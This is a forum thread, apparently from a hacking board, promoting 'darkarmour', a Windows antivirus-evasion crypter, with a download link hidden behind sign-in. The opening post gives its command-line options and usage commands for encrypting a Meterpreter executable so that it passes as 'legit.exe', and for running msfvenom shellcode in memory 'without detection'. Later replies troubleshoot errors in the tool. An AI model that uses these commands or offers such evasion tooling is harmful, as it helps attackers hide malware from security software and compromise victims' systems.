Popular Post dEEpEst Posted January 20, 2020 Popular Post Share Posted January 20, 2020 Windows AV Evasion Tool Store and execute an encrypted windows binary from inside memory, without a single bit touching disk. Usage _,. ,` -.) ( _/-\-._ /,|`--._,-^| ,¡ \_| |`-._/|| / / | `-, / | / / | || | / / ______ _ ___ `r-._||/ __ / / | _ \ | | / _ \ __,-<_ )`-/ `./ / | | | |__ _ _ __| | _/ /_\ \_ __ _ __ ___ ___ _ _ _ __ ' \ `---' \ / / | | | / _` | '__| |/ / _ | '__| '_ ` _ \ / _ \| | | | '__| | |./ / | |/ / (_| | | | <| | | | | | | | | | | (_) | |_| | | / / / |___/ \__,_|_| |_|\_\_| |_/_| |_| |_| |_|\___/ \__,_|_| \_/' \ | / / | | _,^-'/ / | , `` (\ / /_ By Dylan Halls | Version 0.3 \,.->._ \X-=/^ ( / `-._//^` `Y-.____(__} | {__) () usage: darkarmour.py [-h] [-f FILE] -e ENCRYPT [-S SHELLCODE] [-b] [-d] [-u] [-j] [-r] [-s] [-k KEY] [-l LOOP] [-o OUTFILE] optional arguments: -h, --help show this help message and exit -f FILE, --file FILE file to crypt, assumed as binary if not told otherwise -e ENCRYPT, --encrypt ENCRYPT encryption algorithm to use (xor) -S SHELLCODE, --shellcode SHELLCODE file contating the shellcode, needs to be in the 'msfvenom -f raw' style format -b, --binary provide if file is a binary exe -d, --dll use reflective dll injection to execute the binary inside another process -u, --upx pack the executable with upx -j, --jmp use jmp based pe loader -r, --runpe use runpe to load pe -s, --source provide if the file is c source code -k KEY, --key KEY key to encrypt with, randomly generated if not supplied -l LOOP, --loop LOOP number of levels of encryption -o OUTFILE, --outfile OUTFILE name of outfile, if not provided then random filename is assigned Usage Generate an undetectable version of a pe executable ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5 Execute shellcode (x86/64) inside memory without detection, just provide the raw shellcode ./darkarmour.py -S -f bins/meter.bin --encrypt xor --jmp -o bins/legit.exe --loop 5 Installation It uses the python stdlib so no need to worry about any python dependencies, so the only issue you could come accoss are binary dependencies. The required binarys are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probly osslsigncode soon as well). These can all be installed via apt. sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode TODO Intergrate into PowerUp Optional signing of binarys Load pe image over a socket so not stored inside the binary DOWNLOAD This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
yarshi Posted January 24, 2020 Share Posted January 24, 2020 While running the generated exe .... consoles opens an show "Unable to call PE,likely thats invalid" and if using runpe option it gaves error.. "Traceback (most recent call last): File "1.py", line 116, in <module> darkarmour.run(vars(ap.parse_args())) File "1.py", line 96, in run self._do_crypt() File "1.py", line 91, in _do_crypt if self.runpe: AttributeError: 'DarkArmour' object has no attribute 'runpe'" Link to comment Share on other sites More sharing options...
0x1 Posted January 26, 2020 Share Posted January 26, 2020 This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up No use option --runpe (is null) use --jump This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
yarshi Posted January 30, 2020 Share Posted January 30, 2020 On 1/27/2020 at 6:28 AM, 0x1 said: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up No use option --runpe (is null) use --jump This is the hidden content, please Sign In or Sign Up still getting same error with your commands also..and yeah used --jmp not pe ones if pe ones used then it gave erorr and --jmp ones get compiled successfully but unable to run this error came while running a binary output: ""Unable to call PE,likely thats invalid"" Link to comment Share on other sites More sharing options...
0x1 Posted January 31, 2020 Share Posted January 31, 2020 Problem with the code try to contact the developer Quote darkarmour/blob/master/src/jmp_loader/main.c Maybe the error because the PE is different to image_base int main() : This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
yarshi Posted February 1, 2020 Share Posted February 1, 2020 On 1/31/2020 at 3:59 PM, 0x1 said: Problem with the code try to contact the developer Maybe the error because the PE is different to image_base int main() : This is the hidden content, please Sign In or Sign Up yeah looks like same to me...willy try to see if i get contacted to developer Link to comment Share on other sites More sharing options...
Recommended Posts